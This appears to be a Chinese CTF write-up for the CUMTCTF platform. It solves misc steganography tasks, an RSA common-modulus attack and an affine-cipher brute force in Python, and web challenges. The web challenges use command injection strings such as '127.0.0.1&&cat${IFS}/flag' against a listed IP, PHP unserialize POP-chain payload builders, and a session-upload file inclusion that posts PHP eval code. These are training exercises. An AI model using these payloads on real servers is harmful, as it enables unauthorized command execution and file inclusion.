
CUMTCTF竞赛平台


misc

你可劲找之word

  • 在kali 中打开
  • 打开document.xml
  • flag{cumtctf_IS_niubility}

    你可劲找之JPG

    用 010 Editor 查看,便可发现 flag:flag{flag_!s_here_aaaaa}

    你可劲找之淘宝买买买

    先爆破zip密码,为1909nb
    后用 SNOW.EXE 读取:`PS C:\snwdos32> .\SNOW.EXE -C .\taobao.html`,得到 cumtctf{snow_IS_so_white}

    你可劲找之音乐贼好听

  • 打开txt文件,反序得图片
  • 补全二维码,得BxS1909
  • Decode.exe -X -P 'BxS1909' speaker.mp3

    你可劲找之大鲨鱼来了

  • 数据包,先在字节流中搜索 flag 字符串
  • 拼接flag flag{Icmp_backdoor_can_transfer-some_infomation}

    CRYPTO

    星星的低语

  • 密文Qswfzuu_wk_yau?!
  • 密匙ghost
  • 维吉尼亚解密得 flag:CUMTCTF{Klingon_is_fun?!}

    EasyRSA

# -*- coding: utf-8 -*-
from gmpy2 import invert
import binascii
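def gongmogongji(n, c1, c2, e1, e2):
    """RSA common-modulus attack.

    Recover the plaintext ``m`` from two ciphertexts ``c1 = m^e1 mod n`` and
    ``c2 = m^e2 mod n`` that share the modulus ``n`` but use coprime public
    exponents.  With Bezout coefficients ``s1*e1 + s2*e2 == 1`` the message is
    ``c1^s1 * c2^s2 mod n``; a negative coefficient is applied to the modular
    inverse of the corresponding ciphertext instead.

    Args:
        n: shared RSA modulus.
        c1: ciphertext of the message under exponent ``e1``.
        c2: ciphertext of the same message under exponent ``e2``.
        e1: first public exponent.
        e2: second public exponent.

    Returns:
        The recovered message as an ``int``.

    Raises:
        ValueError: if ``gcd(e1, e2) != 1`` (the attack does not apply) or a
            ciphertext has no inverse modulo ``n``.
    """

    def egcd(a, b):
        # Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b).
        # The base case must be (a, 1, 0); the earlier version returned (a, 0),
        # which only happens to be right when the gcd is 1.
        if b == 0:
            return a, 1, 0
        g, x, y = egcd(b, a % b)
        return g, y, x - (a // b) * y

    def modinv(x, modulus):
        # Modular inverse derived from egcd; no third-party bignum library needed.
        g, inv, _ = egcd(x % modulus, modulus)
        if g != 1:
            raise ValueError("ciphertext is not invertible modulo n")
        return inv % modulus

    g, s1, s2 = egcd(e1, e2)
    if g != 1:
        raise ValueError("e1 and e2 must be coprime for the common-modulus attack")

    # Fold a negative Bezout coefficient into an inverted ciphertext so that
    # pow() is only ever called with non-negative exponents.
    if s1 < 0:
        s1, c1 = -s1, modinv(c1, n)
    if s2 < 0:
        s2, c2 = -s2, modinv(c2, n)
    return pow(c1, s1, n) * pow(c2, s2, n) % n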

# Challenge parameters: both ciphertexts were produced under the same modulus
# ``n`` with different public exponents, which is exactly what the attack needs.
n = 15409179157709387241557822685426841443579313151672696544378035820627466617508122062530604139946669340728697620999406940282215117633367743233931254718933601150667815157829687259236246472336122252622342727296574578441506307923356119023632658875925317157796384903071654748687628503417628946352328486576603038386661099039350318676174733827586996443060446551088315380331434077186356265756497177470964732140897803977195640723451121610236945525050901485824618145624534940660537469868358175524552404233477850296944812441656863987279954083829550858880562581730570562695967912408470110382783785378042546294512445145741950785599
e1 = 35807
e2 = 64109
c1 = 8454183967325114702871606020371893044643730848194421087800555329951749548122339370132406738438445748436613875684020078481120800301115768203669597144997733800335384024451758569713148077498773356000202354950315565733238107631918065866000666543639581410947467826793138310934187582903203581147191018919872761778285965302617242724210250702053620543591080088403287542360743392129404353088927828568618521099909157542189940186062740901165582685911913496261428049266993355399200458969282547528002146757745487534561043968844285589219887599453366653980861533030050776967395711234608754210628749429707754565377212941836511464698
c2 = 3474896545293913347667202223451565153852862129794344030200798688166203177565324486722621485505590942555081101762105348054858307764466250576794351605801560468579220594430471412245417182169425232767469252787915312915663322118392070561689481437976881213082255419441547071435443309213796735780603082347566527154600699672908140809936545765094124072879172773255195232516309146970129665290633260997334593298334430430898595943117986308303640513184694554167523992959853810866556034559033529469961279555546599869458610138758291003488308546823595786705144504162047084575649567675866387296272750353993133512245405497044906025497

result = gongmogongji(n=n, c1=c1, c2=c2, e1=e1, e2=e2)
print(result)

# Decoding steps from the write-up: the decimal literal is presumably the
# recovered ``result`` pasted back in (not verified here), rendered as hex and
# then unhexlified into the flag bytes.
print(hex(143822866208467685915742288235397526795410934392605167552521980813958173929763589128464185639973245))
print(binascii.unhexlify(b'43554d544354467b30333762316139633137353339383764353138343533373266366366313862317d'))

仿射密码

#encoding:utf-8

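def NI(x, b):
    """Return the multiplicative inverse of ``x`` modulo ``b``.

    The result ``i`` satisfies ``(x * i) % b == 1`` and is unique when ``x``
    and ``b`` are coprime.  The search is a bounded brute force over
    ``1 .. b-1``, which is adequate for the alphabet-sized modulus used here.

    Raises:
        ValueError: if no inverse exists (``x`` and ``b`` not coprime, or
            ``b < 2``).  The earlier ``while`` loop never terminated on such
            inputs.
    """
    for i in range(1, b):
        if (x * i) % b == 1:
            return i
    raise ValueError("%d has no inverse modulo %d" % (x, b))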

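c = "cejldputgtbjwrfhpttnt"
C = []

# Pre-process the ciphertext into 0-based alphabet positions (a=0 .. z=25);
# spaces are carried through unchanged.  The ciphertext is lowercase, so the
# offset is ord('a') == 97.  Subtracting 65 ('A'), as before, shifted every
# position by 6 mod 26: the brute force still printed every candidate, but the
# (keya, keyb) pair it was produced under no longer matched the real key.
for i in c:
    if i == ' ':
        C.append(i)
    else:
        C.append(ord(i) - 97)

# Candidate multiplicative keys ``a`` tried by the write-up: the residues
# coprime with 26 other than 1 (the plain Caesar case is not searched).
a = [3, 5, 7, 9, 11, 15, 17, 19, 21, 23, 25]
P = []

# Exhaustive key search: for every (a, b) decrypt p = a^-1 * (c - b) mod 26 and
# print the candidate plaintext; the legible line reveals the key.
for keyb in range(0, 26):
    for keya in a:
        ni_a = NI(keya, 26)
        for s in C:
            if s == ' ':
                P.append(' ')
            else:
                P.append(((s - keyb) * ni_a) % 26)
        # Map the positions back to lowercase letters in one pass.
        strP = ''.join(' ' if t == ' ' else chr(t + 97) for t in P)
        print(strP)
        P = []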

web

Blizzard

  • 根据提示用SNOW读取html隐写部分/Secr3t_P4th/index.html
  • 根据robots.txt,下载wake_100.txt
  • 用该字典对http://202.119.201.199:60000/Secr3t_P4th/index.html进行爆破,得ping.php
  • 在ping.php 中命令执行
  • 读取根目录:127.0.0.1&&ls${IFS}/
  • 读取 flag:127.0.0.1&&cat${IFS}/flag
  • cumtctf{A1l_R0ads_L3ad_t0_R0me}

Unserialize

  • 构造pop链查看phpinfo
    <?php
    session_start();
    //step_1: view phpinfo (first stage of the challenge)
    // Outermost link of the chain.  serialize() emits the properties in this
    // declaration order, so names and order are kept exactly as the write-up gives them.
    class A
    {
    public $cumt;
    public $bxs;
    public $mytoken;
    public $yourtoken;
    public function __construct()
    {
    $this->cumt = new B();
    // Reference assignment: serialize() encodes $yourtoken as the "R:" back-reference
    // visible in the expected output string.
    $this->yourtoken = & $this->mytoken;

    }
    }
    // Second link: its $cumt carries a C.
    class B
    {
    public $cumt;
    public $bxs;
    public function __construct()
    {
    $this->cumt = new C();
    }
    }
    // Third link: its $cumt carries the leaf F.
    class C
    {
    public $cumt;
    public $bxs;
    public function __construct()
    {
    $this->cumt = new F();
    }
    }
    // Leaf of the chain.  No constructor, so both properties serialize as N (null)
    // in this first-stage payload.
    class F
    {
    public $cumt;
    public $filename;
    }

    // Build the chain and print its serialized form; that string is the payload.
    $a = new A();
    echo $str = serialize($a);
    //O:1:"A":4:{s:4:"cumt";O:1:"B":2:{s:4:"cumt";O:1:"C":2:{s:4:"cumt";O:1:"F":2:{s:4:"cumt";N;s:8:"filename";N;}s:3:"bxs";N;}s:3:"bxs";N;}s:3:"bxs";N;s:7:"mytoken";N;s:9:"yourtoken";R:10;}
    ?>

session.upload_progress.enabled on
session.upload_progress.cleanup on
session.save_path /var/lib/php5/sess_.PASSID
  • 根据你的phpsessid构建poc2

    <?php
    //http://202.119.201.199:50000/
    //File inclusion via session.upload_progress: the session file named in
    //F::$filename is the include target, so the PHPSESSID must be the reader's own.
    session_start();
    // Outermost link of the second-stage chain.  Property names and declaration
    // order determine the serialize() output, so they are kept as given.
    class A
    {
    public $cumt;
    public $bxs;
    public $mytoken;
    public $yourtoken;
    public function __construct()
    {
    $this->cumt = new B();
    // Serialized as an "R:" back-reference to $mytoken.
    $this->yourtoken = & $this->mytoken;
    }
    }
    // Second link: nests a C.
    class B
    {
    public $cumt;
    public $bxs;
    public function __construct()
    {
    $this->cumt = new C();
    }
    }
    // Third link: nests a D.
    class C
    {
    public $cumt;
    public $bxs;
    public function __construct()
    {
    $this->cumt = new D();
    }
    }
    // Fourth link: nests an E.
    class D
    {
    public $cumt;
    public $bxs;
    public function __construct()
    {
    $this->cumt = new E();
    }
    }
    // Fifth link: nests the leaf F, which carries the file name.
    class E
    {
    public $cumt;
    public $bxs;
    public function __construct()
    {
    $this->cumt = new F();
    }
    }
    class F
    {
        public $cumt;
        public $filename;

        // Only the properties are serialized, so on the payload side the
        // constructor's sole job is to point $filename at the session file;
        // "your_phpsessiD" is the placeholder the reader replaces.
        public function __construct()
        {
            $this->filename = "/var/lib/php5/sess_" . "your_phpsessiD";
        }

        // Presumably copied from the target's class so the chain reads end to
        // end (methods do not travel with serialize()): it copies $filename into
        // $_GET['data'] and include_once()s that path.
        public function get_something()
        {
            $_GET['data'] = "$this->filename";
            if (!include_once($_GET['data'])) {
                echo "Hack!";
                return;
            }
            include_once($_GET['data']);
        }

        public function __invoke()
        {
            phpinfo();
        }
    }

    // Serialize the chain and print it; urlencode($str) instead when the payload
    // is placed in a URL rather than a request body.
    $a = new A();
    echo $str = serialize($a);
    ?>

  • 同时 POST user=<?php eval("phpinfo();")?>,此处以 phpinfo 函数为例。
